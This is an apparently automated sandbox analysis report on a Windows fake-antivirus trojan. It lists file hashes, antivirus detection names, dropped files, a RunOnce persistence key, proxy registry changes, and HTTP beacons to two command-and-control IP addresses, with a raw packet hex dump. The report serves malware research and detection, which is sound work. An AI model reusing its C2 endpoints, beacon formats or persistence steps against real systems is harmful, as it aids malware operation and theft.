Analysis Date: 2015-09-07 00:18:38
MD5: 3bf70048b84f24209f1b18bbddb7df7c
SHA1: 5beb6edd15712f7cc454cad75322c54bf5151dcb

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text  md5: 1288991a9c5fd7fbe9e10c33194a7f1b  sha1: a17958588662c27215699550ec4e523854913d16  size: 181760
Section .rdata  md5: 02e582a7214ac986b632e633a75288cc  sha1: 246ed5fdb450a36f1e0934a9a2bd582509f59237  size: 2048
Section .data  md5: fcad16bfa9d1017ab26c27a3814b568b  sha1: 4534d1bc8aeea0ee3ffb429f3b568811bc940bbd  size: 122368
Section .rsrc  md5: 37c01c87464a34242230feaabfbef9a1  sha1: 44cabb61a6a8beaf2c68292365e931757d36d255  size: 5120
Timestamp: 1970-01-01 05:15:22
PEhash: d988b0829a0f3cf9cf5a37856f6f5f76f0887e41
IMPhash: 8aaaf4897d2db89e81da04378e9e697c
AV K7: Trojan ( 001e60c61 )
AV Microsoft Security Essentials: Rogue:Win32/Winwebsec
AV CAT (quickheal): FraudTool.Security
AV Alwil (avast): MalOb-FY [Cryp]
AV Avira (antivir): TR/FakeAV.btxt.7
AV Eset (nod32): Win32/Kryptik.LYW
AV Authentium: W32/FakeAlert.LY.gen!Eldorado
AV MalwareBytes: Trojan.Agent
AV BitDefender: Gen:Heur.Cridex.2
AV MicroWorld (escan): Gen:Heur.Cridex.2
AV Zillya!: Trojan.FakeAV.Win32.56917
AV Arcabit (arcavir): Gen:Heur.Cridex.2
AV Rising: Trojan.FakeAV!49B1
AV VirusBlokAda (vba32): Malware-Cryptor.Limpopo
AV Mcafee: Generic FakeAlert.amb
AV Ad-Aware: Gen:Heur.Cridex.2
AV BullGuard: Gen:Heur.Cridex.2
AV Frisk (f-prot): W32/FakeAlert.LY.gen!Eldorado
AV ClamAV: Trojan.FakeAV-5389
AV Grisoft (avg): FakeAlert.AAS
AV Twister: Trojan.558BEC81C4DCFAFFF.mg
AV Kaspersky: Trojan.Win32.FakeAV.btxt
AV Emsisoft: Gen:Heur.Cridex.2
AV CA (E-Trust Ino): Win32/Diple.A!generic
AV Fortinet: W32/FakeAlert.AMB!tr
AV Symantec: Trojan.FakeAV!gen39
AV Trend Micro: TROJ_FAKEAV.SMID
AV Padvish: Malware.Trojan.FakeAV-5389
AV F-Secure: Gen:Heur.Cridex.2
AV Dr. Web: Trojan.Inject.28816
AV Ikarus: Trojan.Win32.FakeAV

Runtime Details:

Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\a3A64.tmp
Creates File: C:\Documents and Settings\All Users\Application Data\jGpJoLnFdJa25900\jGpJoLnFdJa25900.exe
Creates File: C:\5beb6edd15712f7cc454cad75322c54bf5151dcb
Deletes File: C:\5beb6edd15712f7cc454cad75322c54bf5151dcb
Creates Process: "C:\Documents and Settings\All Users\Application Data\jGpJoLnFdJa25900\jGpJoLnFdJa25900.exe" "C:\malware.exe"
Creates Process: "C:\Documents and Settings\Administrator\Local Settings\Temp\aE22D.tmp"
Creates Mutex: Don't stop me! I need some money!

Process
↳ "C:\Documents and Settings\All Users\Application Data\jGpJoLnFdJa25900\jGpJoLnFdJa25900.exe" "C:\malware.exe"

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Registry: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\jGpJoLnFdJa25900 ➝ C:\Documents and Settings\All Users\Application Data\jGpJoLnFdJa25900\jGpJoLnFdJa25900.exe\\x00
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: C:\Documents and Settings\All Users\Application Data\jGpJoLnFdJa25900\jGpJoLnFdJa25900
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: \Device\Afd\AsyncConnectHlp
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: Don't stop me! I give work and money for you!
Winsock DNS: 69.50.195.77

Process
↳ "C:\Documents and Settings\Administrator\Local Settings\Temp\aE22D.tmp"

Network Details:

HTTP GET: http://194.28.113.214/lurl.php?affid=25900
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
HTTP POST: http://69.50.195.77/i.php?affid=25900
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; GTB0.0; .NET CLR 1.1.4322)
HTTP GET: http://69.50.195.77/r.php?affid=25900&data=31AEA843B2D209EF2E25E669DAB068379E8D0586096F1D0BFB8CD08A81B3C857010410&v=1&h=1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
Flows TCP: 192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP: 192.168.1.1:1031 ➝ 194.28.113.214:80
Flows TCP: 192.168.1.1:1032 ➝ 69.50.195.77:80
Flows TCP: 192.168.1.1:1034 ➝ 69.50.195.77:80

Raw Pcap
0x00000000 (00000)   47455420 2f6c7572 6c2e7068 703f6166   GET /lurl.php?af
0x00000010 (00016)   6669643d 32353930 30204854 54502f31   fid=25900 HTTP/1
0x00000020 (00032)   2e310d0a 52656665 7265723a 20687474   .1..Referer: htt
0x00000030 (00048)   703a2f2f 3139342e 32382e31 31332e32   p://194.28.113.2
0x00000040 (00064)   31340d0a 41636365 70743a20 2a2f2f2a   14..Accept: *//*
0x00000050 (00080)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000060 (00096)   7a696c6c 612f342e 30202863 6f6d7061   zilla/4.0 (compa
0x00000070 (00112)   7469626c 653b204d 53494520 372e303b   tible; MSIE 7.0;
0x00000080 (00128)   2057696e 646f7773 204e5420 352e313b    Windows NT 5.1;
0x00000090 (00144)   20475442 302e303b 202e4e45 5420434c    GTB0.0; .NET CL
0x000000a0 (00160)   5220312e 312e3433 3232290d 0a486f73   R 1.1.4322)..Hos
0x000000b0 (00176)   743a2031 39342e32 382e3131 332e3231   t: 194.28.113.21
0x000000c0 (00192)   340d0a43 6f6e6e65 6374696f 6e3a204b   4..Connection: K
0x000000d0 (00208)   6565702d 416c6976 650d0a43 61636865   eep-Alive..Cache
0x000000e0 (00224)   2d436f6e 74726f6c 3a206e6f 2d636163   -Control: no-cac
0x000000f0 (00240)   68650d0a 0d0a                         he....

0x00000000 (00000)   504f5354 202f692e 7068703f 61666669   POST /i.php?affi
0x00000010 (00016)   643d3235 39303020 48545450 2f312e31   d=25900 HTTP/1.1
0x00000020 (00032)   0d0a5265 66657265 723a2068 7474703a   ..Referer: http:
0x00000030 (00048)   2f2f3639 2e35302e 3139352e 37370d0a   //69.50.195.77..
0x00000040 (00064)   41636365 70743a20 2a2f2f2a 0d0a436f   Accept: *//*..Co
0x00000050 (00080)   6e74656e 742d5479 70653a20 6170706c   ntent-Type: appl
0x00000060 (00096)   69636174 696f6e2f 782d7777 772d666f   ication/x-www-fo
0x00000070 (00112)   726d2d75 726c656e 636f6465 640d0a55   rm-urlencoded..U
0x00000080 (00128)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000090 (00144)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x000000a0 (00160)   6c653b20 4d534945 20372e30 3b205769   le; MSIE 7.0; Wi
0x000000b0 (00176)   6e646f77 73204e54 20352e31 3b204754   ndows NT 5.1; GT
0x000000c0 (00192)   42302e30 3b202e4e 45542043 4c522031   B0.0; .NET CLR 1
0x000000d0 (00208)   2e312e34 33323229 0d0a486f 73743a20   .1.4322)..Host: 
0x000000e0 (00224)   36392e35 302e3139 352e3737 0d0a436f   69.50.195.77..Co
0x000000f0 (00240)   6e74656e 742d4c65 6e677468 3a203738   ntent-Length: 78
0x00000100 (00256)   0d0a436f 6e6e6563 74696f6e 3a204b65   ..Connection: Ke
0x00000110 (00272)   65702d41 6c697665 0d0a4361 6368652d   ep-Alive..Cache-
0x00000120 (00288)   436f6e74 726f6c3a 206e6f2d 63616368   Control: no-cach
0x00000130 (00304)   650d0a0d 0a646174 613d3331 41454138   e....data=31AEA8
0x00000140 (00320)   34334232 44323039 45463245 32354536   43B2D209EF2E25E6
0x00000150 (00336)   36394441 42303638 33373945 38443035   69DAB068379E8D05
0x00000160 (00352)   38363039 36463144 30424642 38434430   86096F1D0BFB8CD0
0x00000170 (00368)   38413831 42334338 35373031 30343126   8A81B3C85701041&
0x00000180 (00384)   763d31                                v=1

0x00000000 (00000)   47455420 2f722e70 68703f61 66666964   GET /r.php?affid
0x00000010 (00016)   3d323539 30302664 6174613d 33314145   =25900&data=31AE
0x00000020 (00032)   41383433 42324432 30394546 32453235   A843B2D209EF2E25
0x00000030 (00048)   45363639 44414230 36383337 39453844   E669DAB068379E8D
0x00000040 (00064)   30353836 30393646 31443042 46423843   0586096F1D0BFB8C
0x00000050 (00080)   44303841 38314233 43383537 30313034   D08A81B3C8570104
0x00000060 (00096)   31302676 3d312668 3d312048 5454502f   10&v=1&h=1 HTTP/
0x00000070 (00112)   312e310d 0a416363 6570743a 202a2f2a   1.1..Accept: */*
0x00000080 (00128)   0d0a4163 63657074 2d4c616e 67756167   ..Accept-Languag
0x00000090 (00144)   653a2065 6e2d7573 0d0a4163 63657074   e: en-us..Accept
0x000000a0 (00160)   2d456e63 6f64696e 673a2067 7a69702c   -Encoding: gzip,
0x000000b0 (00176)   20646566 6c617465 0d0a5573 65722d41    deflate..User-A
0x000000c0 (00192)   67656e74 3a204d6f 7a696c6c 612f342e   gent: Mozilla/4.
0x000000d0 (00208)   30202863 6f6d7061 7469626c 653b204d   0 (compatible; M
0x000000e0 (00224)   53494520 362e303b 2057696e 646f7773   SIE 6.0; Windows
0x000000f0 (00240)   204e5420 352e313b 20535631 3b202e4e    NT 5.1; SV1; .N
0x00000100 (00256)   45542043 4c522032 2e302e35 30373237   ET CLR 2.0.50727
0x00000110 (00272)   290d0a48 6f73743a 2036392e 35302e31   )..Host: 69.50.1
0x00000120 (00288)   39352e37 370d0a43 6f6e6e65 6374696f   95.77..Connectio
0x00000130 (00304)   6e3a204b 6565702d 416c6976 650d0a0d   n: Keep-Alive...
0x00000140 (00320)   0a334232 44323039 45463245 32354536   .3B2D209EF2E25E6
0x00000150 (00336)   36394441 42303638 33373945 38443035   69DAB068379E8D05
0x00000160 (00352)   38363039 36463144 30424642 38434430   86096F1D0BFB8CD0
0x00000170 (00368)   38413831 42334338 35373031 30343126   8A81B3C85701041&
0x00000180 (00384)   763d31                                v=1

Strings